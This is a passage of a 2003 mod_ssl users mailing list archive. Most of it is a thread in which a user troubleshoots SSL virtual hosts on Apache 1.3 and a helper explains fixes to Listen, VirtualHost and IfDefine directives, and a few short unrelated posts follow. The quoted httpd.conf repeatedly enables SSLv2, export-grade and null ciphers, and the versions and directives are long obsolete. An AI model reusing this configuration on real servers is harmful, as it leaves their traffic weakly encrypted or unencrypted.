ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
SSLCACertificatePath /usr/local/etc/apache/ssl.crt
SSLCARevocationPath /usr/local/etc/apache/ssl.crl
SSLVerifyClient require



You can see where I tried different versions of the VirtualHost tag (I
did change the ServerName value for each variation). This is a server
that hosts several sites, but they all use the same IP, so all of the
VirtualHost tags are=20


...


This seems to get the job done for the few sites on this one computer,
but now I need SSL. I'm at a loss and any help would be appreciated.

TIA,

Tom
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 29 03:26:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7326EA8948; Thu, 29 May 2003 03:26:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-02.texas.rr.com (ms-smtp-02.texas.rr.com [24.93.36.230])
	by master.modssl.org (Postfix) with ESMTP id AF1F8A8935
	for ; Thu, 29 May 2003 03:26:20 +0200 (CEST)
Received: from tom (cs666817-180.austin.rr.com [66.68.17.180])
	by ms-smtp-02.texas.rr.com (8.12.5/8.12.2) with SMTP id h4T1QIfB004777
	for ; Wed, 28 May 2003 20:26:19 -0500 (CDT)
Message-ID: <000f01c32581$5859e0c0$6501a8c0@austin.rr.com>
From: "Tom Bartling" 
To: 
References: 
Subject: Re: unknown protocol
Date: Wed, 28 May 2003 20:26:35 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tom Bartling" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the help. When I comment out the  containers, none of
the sites work. If I leave everything the way I have it now except move the
"Port 443" line outsite the IfDefine containers, http'ing to any of the
sites will display the primary site.

Any ideas?

Thanks, again.

Tom



----- Original Message -----
From: "Boyle Owen" 
To: 
Sent: Wednesday, May 28, 2003 3:31 AM
Subject: RE: unknown protocol


Plain text please...

It looks like you are not succeeding in starting an SSL VH.

Looking at your config, there is no obvious error, although I don't know
why you put the "Listen 80" inside the IfDefine - this would mean that
even plain HTTP wouldn't work unless you started with SSL.

Just to be clear how it works, "apachectl startssl" causes the apache
control script to execute "httpd -DSSL". This starts apache with the
environment variable SSL defined. So when apache finds an 
container, it evaluates the condition as "true" and so reads the
directives inside. This is the canonical way of selecting SSL.

Of course, you don't need to bother with all of this. If you put the SSL
VH outside the  block (or just remove the 
tags) then the SSL VH and its directives will fire up in a normal
"apachectl start".

You might try this - just make sure you have a single VH on port 443 and
a Listen 443 and it should startup. Be careful you don't have a plain
HTTP VH on port 443 - it could supersede the SSL VH. To test, what
happens if you make a plain HTTP request to port 443 (it shouldn't
work!)

About the PHP warning - when you recompiled apache to include mod_ssl,
it patched the apache API to extend it to allow hooks into the OpenSSL
library (EAPI = Extended API). Since the PHP module was compiled before
this, it is expecting the standard API. Probably it will continue to
work since the EAPI is a superset of the API but you never know if there
will be a conflict in some call somewhere (you'll get a seg fault if
there is). The safest thing to do is to recompile mod_php against the
new API.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.



-----Original Message-----
From: Tom Bartling [mailto:tom@tombartling.com]
Sent: Mittwoch, 28. Mai 2003 07:51
To: modssl-users@modssl.org
Subject: unknown protocol


Hi,

I am new to the list and relatively new to administering SSL, so please
forgive me if this is not the right place to ask this question.

I am having trouble getting SSL to work. I'm on FreeBSD 4.5 Stable with
apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.

Everything seems to have installed okay and I can run apachectl startssl
without any problems, but I can't get SSL to actually work. When I try
to go the url via https, it immediately displays the dreaded "this page
cannot be displayed" message. When I run apachectl configtest, it spits
out the following:

apachectl configtest
[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so
uses plain Apache 1.3 API, this module might crash under EAPI! (please
recompile it with -DEAPI)
Syntax OK

PHP works without any problems, so I'm not concerned about that at the
moment. The manual says to try:

openssl s_client -connect localhost:443 -state -debug

As an alternative, it suggests:

curl https://localhost/

Both display an error message:

SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

So, I'm thinkin' that the problem is in the httpd.conf file. A few
things that are in there of importance (excluding comments and all of
the other stuff) include:

Port 80


Listen 80
Listen 443



#
#
#
#


DocumentRoot "/usr/local/www/data"
ServerName www.mintecommerce.com
ServerAdmin webmaster@mintecommerce.com
ErrorLog /var/log/httpd-error.log
TransferLog /var/log/httpd-access.log

SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
SSLCACertificatePath /usr/local/etc/apache/ssl.crt
SSLCARevocationPath /usr/local/etc/apache/ssl.crl
SSLVerifyClient require



You can see where I tried different versions of the VirtualHost tag (I
did change the ServerName value for each variation). This is a server
that hosts several sites, but they all use the same IP, so all of the
VirtualHost tags are


...


This seems to get the job done for the few sites on this one computer,
but now I need SSL. I'm at a loss and any help would be appreciated.

TIA,

Tom
Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
présent e-mail est un message privé et personnel, sans rapport avec
l'activité boursière de la SWX Swiss Exchange

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 30 10:04:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 15F03A8958; Fri, 30 May 2003 10:04:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 17985A893D
	for ; Fri, 30 May 2003 10:04:29 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h4U84Rig001815
	for ; Fri, 30 May 2003 10:04:28 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h4U84Qmh011466
	for ; Fri, 30 May 2003 10:04:27 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: unknown protocol
Date: Fri, 30 May 2003 10:04:26 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: unknown protocol
Thread-Index: AcMlgXnmDmWPpAaTRNeki0WDucE8oAA//WOg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Tom Bartling [mailto:tom@tombartling.com]
>
>Thanks for the help. When I comment out the =20
>containers, none of
>the sites work. If I leave everything the way I have it now=20
>except move the
>"Port 443" line outsite the IfDefine containers, http'ing to any of the
>sites will display the primary site.

Commenting out the  tags means that the directives that they =
contain will be acted upon. If that changes things, then they can't have =
been getting activated before. If activating these directives breaks =
your VirtualHosting setup, then it must have been in error to begin with =
and was "working" by accident.

If you'd care to post your config or send it directly, I'll have a look =
and see if there's anything wrong with it.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20


>
>Any ideas?
>
>Thanks, again.
>
>Tom
>
>
>
>----- Original Message -----
>From: "Boyle Owen" 
>To: 
>Sent: Wednesday, May 28, 2003 3:31 AM
>Subject: RE: unknown protocol
>
>
>Plain text please...
>
>It looks like you are not succeeding in starting an SSL VH.
>
>Looking at your config, there is no obvious error, although I=20
>don't know
>why you put the "Listen 80" inside the IfDefine - this would mean that
>even plain HTTP wouldn't work unless you started with SSL.
>
>Just to be clear how it works, "apachectl startssl" causes the apache
>control script to execute "httpd -DSSL". This starts apache with the
>environment variable SSL defined. So when apache finds an=20
>
>container, it evaluates the condition as "true" and so reads the
>directives inside. This is the canonical way of selecting SSL.
>
>Of course, you don't need to bother with all of this. If you=20
>put the SSL
>VH outside the  block (or just remove the 
>tags) then the SSL VH and its directives will fire up in a normal
>"apachectl start".
>
>You might try this - just make sure you have a single VH on=20
>port 443 and
>a Listen 443 and it should startup. Be careful you don't have a plain
>HTTP VH on port 443 - it could supersede the SSL VH. To test, what
>happens if you make a plain HTTP request to port 443 (it shouldn't
>work!)
>
>About the PHP warning - when you recompiled apache to include mod_ssl,
>it patched the apache API to extend it to allow hooks into the OpenSSL
>library (EAPI =3D Extended API). Since the PHP module was compiled =
before
>this, it is expecting the standard API. Probably it will continue to
>work since the EAPI is a superset of the API but you never=20
>know if there
>will be a conflict in some call somewhere (you'll get a seg fault if
>there is). The safest thing to do is to recompile mod_php against the
>new API.
>
>Rgds,
>Owen Boyle
>Disclaimer: Any disclaimer attached to this message may be ignored.
>
>
>
>-----Original Message-----
>From: Tom Bartling [mailto:tom@tombartling.com]
>Sent: Mittwoch, 28. Mai 2003 07:51
>To: modssl-users@modssl.org
>Subject: unknown protocol
>
>
>Hi,
>
>I am new to the list and relatively new to administering SSL, so please
>forgive me if this is not the right place to ask this question.
>
>I am having trouble getting SSL to work. I'm on FreeBSD 4.5 Stable with
>apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.
>
>Everything seems to have installed okay and I can run=20
>apachectl startssl
>without any problems, but I can't get SSL to actually work. When I try
>to go the url via https, it immediately displays the dreaded "this page
>cannot be displayed" message. When I run apachectl configtest, it spits
>out the following:
>
>apachectl configtest
>[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so
>uses plain Apache 1.3 API, this module might crash under EAPI! (please
>recompile it with -DEAPI)
>Syntax OK
>
>PHP works without any problems, so I'm not concerned about that at the
>moment. The manual says to try:
>
>openssl s_client -connect localhost:443 -state -debug
>
>As an alternative, it suggests:
>
>curl https://localhost/
>
>Both display an error message:
>
>SSL: error:140770FC:SSL=20
>routines:SSL23_GET_SERVER_HELLO:unknown protocol
>
>So, I'm thinkin' that the problem is in the httpd.conf file. A few
>things that are in there of importance (excluding comments and all of
>the other stuff) include:
>
>Port 80
>
>
>Listen 80
>Listen 443
>
>
>
>#
>#
>#
>#
>
>
>DocumentRoot "/usr/local/www/data"
>ServerName www.mintecommerce.com
>ServerAdmin webmaster@mintecommerce.com
>ErrorLog /var/log/httpd-error.log
>TransferLog /var/log/httpd-access.log
>
>SSLEngine on
>SSLCipherSuite
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
>SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
>SSLCACertificatePath /usr/local/etc/apache/ssl.crt
>SSLCARevocationPath /usr/local/etc/apache/ssl.crl
>SSLVerifyClient require
>
>
>
>You can see where I tried different versions of the VirtualHost tag (I
>did change the ServerName value for each variation). This is a server
>that hosts several sites, but they all use the same IP, so all of the
>VirtualHost tags are
>
>
>...
>
>
>This seems to get the job done for the few sites on this one computer,
>but now I need SSL. I'm at a loss and any help would be appreciated.
>
>TIA,
>
>Tom
>Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
>keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss=20
>Exchange.
>This e-mail is of a private and personal nature. It is not related to
>the exchange or business activities of the SWX Swiss Exchange. Le
>pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
>l'activit=E9 boursi=E8re de la SWX Swiss Exchange
>
>This message is for the named person's use only. It may contain
>confidential, proprietary or legally privileged information. No
>confidentiality or privilege is waived or lost by any mistransmission.
>If you receive this message in error, please notify the sender urgently
>and then immediately delete the message and any copies of it from your
>system. Please also immediately destroy any hardcopies of the message.
>You must not, directly or indirectly, use, disclose, distribute, print,
>or copy any part of this message if you are not the intended recipient.
>The sender's company reserves the right to monitor all e-mail
>communications through their networks. Any views expressed in this
>message are those of the individual sender, except where the message
>states otherwise and the sender is authorised to state them to be the
>views of the sender's company.
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat =
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange. This e-mail is of a private and personal nature. It is not =
related to the exchange or business activities of the SWX Swiss =
Exchange. Le pr=E9sent e-mail est un message priv=E9 et personnel, sans =
rapport avec l'activit=E9 boursi=E8re de la SWX Swiss Exchange

=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 30 17:24:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5B010A8958; Fri, 30 May 2003 17:24:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from th23.opsion.fr (th23.opsion.fr [62.39.122.33])
	by master.modssl.org (Postfix) with SMTP id 03878A893D
	for ; Fri, 30 May 2003 17:24:30 +0200 (CEST)
Received: from 212.180.95.194 [212.180.95.194] by th23.opsion.fr id 200305301515.3947; Fri, 30 May 2003 15:15:57 GMT
Message-ID: <3ED7764B.3090307@ifrance.com>
Date: Fri, 30 May 2003 17:18:35 +0200
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030206
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Get cert values
References: 
In-Reply-To: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Is there a way to get these X509 Certificate values:
- Subject Key Identifier:
- Authority Key Identifier:


i am actually able to get DN, Serial, with ssl_var_lookup(), but i 
didn't find how to do with SKI and AKI

regards,

Estrade Matthieu

_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? Télécharger MSN Messenger
http://www.ifrance.com/_reloc/m la 1ère messagerie instantanée de France

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  2 04:24:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1DA34A8967; Mon,  2 Jun 2003 04:24:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from unigeek.com (unigeek.com [64.240.156.245])
	by master.modssl.org (Postfix) with SMTP id 9050FA8965
	for ; Mon,  2 Jun 2003 04:24:06 +0200 (CEST)
Received: (qmail 30730 invoked from network); 2 Jun 2003 02:24:03 -0000
Received: from 24-136-9-34.na.21stcentury.net (HELO ?192.168.1.101?) (24.136.9.34)
  by unigeek.com with SMTP; 2 Jun 2003 02:24:03 -0000
Subject: test please ignore
From: Ronald Petty 
To: modssl-users@modssl.org
Content-Type: text/plain
Organization: UNIGEEK
Message-Id: <1054519607.2450.1.camel@laptop.unigeek.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 
Date: 01 Jun 2003 21:06:48 -0500
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronald Petty 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am having a hard time with this list, first I couldn't join, then I
haven't received any mail since it supposedly succeeded.  In fact I have
not reached one message yet and its been a couple of days.  Anyone on
this list?

Ron

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  2 07:22:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EA73AA8946; Mon,  2 Jun 2003 07:21:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 908A6A8935
	for ; Mon,  2 Jun 2003 07:21:58 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 1EAD76E414F; Mon,  2 Jun 2003 07:21:51 +0200 (CEST)
Date: Mon, 2 Jun 2003 07:21:51 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: test please ignore
Message-ID: <20030602052150.GB1767@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <1054519607.2450.1.camel@laptop.unigeek.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1054519607.2450.1.camel@laptop.unigeek.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Jun 01, 2003 at 09:06:48PM -0500, Ronald Petty wrote:
> I am having a hard time with this list, first I couldn't join, then I
> haven't received any mail since it supposedly succeeded.  In fact I have
> not reached one message yet and its been a couple of days.  Anyone on
> this list?
> 
Yeah, there's plety of people on the list, but it does go quiet at times.
Last message was friday - always check the list archive:
http://marc.theaimsgroup.com/?l=apache-modssl

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  2 10:54:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0F692A8946; Mon,  2 Jun 2003 10:54:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 6AFE0A8935
	for ; Mon,  2 Jun 2003 10:54:34 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h528sWig012215
	for ; Mon, 2 Jun 2003 10:54:33 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.9/8.12.6) with ESMTP id h528sUig019497
	for ; Mon, 2 Jun 2003 10:54:32 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: unknown protocol
Date: Mon, 2 Jun 2003 10:54:31 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: unknown protocol
Thread-Index: AcMlgXnmDmWPpAaTRNeki0WDucE8oAA//WOgAJi6fxA=
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>>-----Original Message-----
>>From: Tom Bartling [mailto:tom@tombartling.com]
>>
>If you'd care to post your config or send it directly, I'll=20
>have a look and see if there's anything wrong with it.

There are several minor problems with your config which, taken together, =
may be adding up to the confusing behaviour you are seeing. If you work =
through the following it may improve matters:

General Strategy:
- Since your server has two IP addresses, use default IP addressing =
(i.e. listen to all active IPs).
- Since you need VirtualHosting, use this throughout (i.e. lose the idea =
of a "main server").
- Aim for multiple name-based VHs on port 80 and one single SSL VH on =
port 443.

Details:
1) Don't use "Port" and "Listen". These two directives are very similar =
and "Listen" is preferred ("Port" is deprecated): Remove all "Port" =
directives.

2) Don't use domain names in Listens or VHs since this makes your config =
dependent on DNS. Use default:
=20
Listen secure.mintecommerce.com:443 		->	Listen 443
	->	

(NB - the only thing which should define the SSL VH is the port number).

3) Move "main server" into first VH container. At the moment, this has =
only a ServerName - this is odd and I've no idea what apache would do in =
this case (I guess you expect it to default to the "main server" - I =
wouldn't count on it). You can achieve this simply by moving the "main" =
DocumentRoot into this VH:


	ServerName www.mintecommerce.com
	DocumentRoot "/usr/local/www/data"


the other directives can remain outside where they will apply globally =
as appropriate.

4) To complete the encapsulation of HTTP and HTTPS, add port 80 to all =
HTTP VHs:

	->	

(already done this for the SSL VH in (2) above).

Now try a restart without SSL and check the name-based VHs all work, =
including the "main" server. If that's OK, restart with SSL and test =
https://www.mintecommerce.com/.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20


>>
>>
>>
>>----- Original Message -----
>>From: "Boyle Owen" 
>>To: 
>>Sent: Wednesday, May 28, 2003 3:31 AM
>>Subject: RE: unknown protocol
>>
>>
>>Plain text please...
>>
>>It looks like you are not succeeding in starting an SSL VH.
>>
>>Looking at your config, there is no obvious error, although I=20
>>don't know
>>why you put the "Listen 80" inside the IfDefine - this would mean that
>>even plain HTTP wouldn't work unless you started with SSL.
>>
>>Just to be clear how it works, "apachectl startssl" causes the apache
>>control script to execute "httpd -DSSL". This starts apache with the
>>environment variable SSL defined. So when apache finds an=20
>>
>>container, it evaluates the condition as "true" and so reads the
>>directives inside. This is the canonical way of selecting SSL.
>>
>>Of course, you don't need to bother with all of this. If you=20
>>put the SSL
>>VH outside the  block (or just remove the 
>>tags) then the SSL VH and its directives will fire up in a normal
>>"apachectl start".
>>
>>You might try this - just make sure you have a single VH on=20
>>port 443 and
>>a Listen 443 and it should startup. Be careful you don't have a plain
>>HTTP VH on port 443 - it could supersede the SSL VH. To test, what
>>happens if you make a plain HTTP request to port 443 (it shouldn't
>>work!)
>>
>>About the PHP warning - when you recompiled apache to include mod_ssl,
>>it patched the apache API to extend it to allow hooks into the OpenSSL
>>library (EAPI =3D Extended API). Since the PHP module was=20
>compiled before
>>this, it is expecting the standard API. Probably it will continue to
>>work since the EAPI is a superset of the API but you never=20
>>know if there
>>will be a conflict in some call somewhere (you'll get a seg fault if
>>there is). The safest thing to do is to recompile mod_php against the
>>new API.
>>
>>Rgds,
>>Owen Boyle
>>Disclaimer: Any disclaimer attached to this message may be ignored.
>>
>>
>>
>>-----Original Message-----
>>From: Tom Bartling [mailto:tom@tombartling.com]
>>Sent: Mittwoch, 28. Mai 2003 07:51
>>To: modssl-users@modssl.org
>>Subject: unknown protocol
>>
>>
>>Hi,
>>
>>I am new to the list and relatively new to administering SSL,=20
>so please
>>forgive me if this is not the right place to ask this question.
>>
>>I am having trouble getting SSL to work. I'm on FreeBSD 4.5=20
>Stable with
>>apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.
>>
>>Everything seems to have installed okay and I can run=20
>>apachectl startssl
>>without any problems, but I can't get SSL to actually work. When I try
>>to go the url via https, it immediately displays the dreaded=20
>"this page
>>cannot be displayed" message. When I run apachectl=20
>configtest, it spits
>>out the following:
>>
>>apachectl configtest
>>[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so
>>uses plain Apache 1.3 API, this module might crash under EAPI! (please
>>recompile it with -DEAPI)
>>Syntax OK
>>
>>PHP works without any problems, so I'm not concerned about that at the
>>moment. The manual says to try:
>>
>>openssl s_client -connect localhost:443 -state -debug
>>
>>As an alternative, it suggests:
>>
>>curl https://localhost/
>>
>>Both display an error message:
>>
>>SSL: error:140770FC:SSL=20
>>routines:SSL23_GET_SERVER_HELLO:unknown protocol
>>
>>So, I'm thinkin' that the problem is in the httpd.conf file. A few
>>things that are in there of importance (excluding comments and all of
>>the other stuff) include:
>>
>>Port 80
>>
>>
>>Listen 80
>>Listen 443
>>
>>
>>
>>#
>>#
>>#
>>#
>>
>>
>>DocumentRoot "/usr/local/www/data"
>>ServerName www.mintecommerce.com
>>ServerAdmin webmaster@mintecommerce.com
>>ErrorLog /var/log/httpd-error.log
>>TransferLog /var/log/httpd-access.log
>>
>>SSLEngine on
>>SSLCipherSuite
>>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>>SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
>>SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
>>SSLCACertificatePath /usr/local/etc/apache/ssl.crt
>>SSLCARevocationPath /usr/local/etc/apache/ssl.crl
>>SSLVerifyClient require
>>
>>
>>
>>You can see where I tried different versions of the VirtualHost tag (I
>>did change the ServerName value for each variation). This is a server
>>that hosts several sites, but they all use the same IP, so all of the
>>VirtualHost tags are
>>
>>
>>...
>>
>>
>>This seems to get the job done for the few sites on this one computer,
>>but now I need SSL. I'm at a loss and any help would be appreciated.
>>
>>TIA,
>>
>>Tom
>>Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
>>keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss=20
>>Exchange.
>>This e-mail is of a private and personal nature. It is not related to
>>the exchange or business activities of the SWX Swiss Exchange. Le
>>pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport =
avec
>>l'activit=E9 boursi=E8re de la SWX Swiss Exchange
>>
>>This message is for the named person's use only. It may contain
>>confidential, proprietary or legally privileged information. No
>>confidentiality or privilege is waived or lost by any mistransmission.
>>If you receive this message in error, please notify the=20
>sender urgently
>>and then immediately delete the message and any copies of it from your
>>system. Please also immediately destroy any hardcopies of the message.
>>You must not, directly or indirectly, use, disclose,=20
>distribute, print,
>>or copy any part of this message if you are not the intended=20
>recipient.
>>The sender's company reserves the right to monitor all e-mail
>>communications through their networks. Any views expressed in this
>>message are those of the individual sender, except where the message
>>states otherwise and the sender is authorised to state them to be the
>>views of the sender's company.
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>______________________________________________________________________
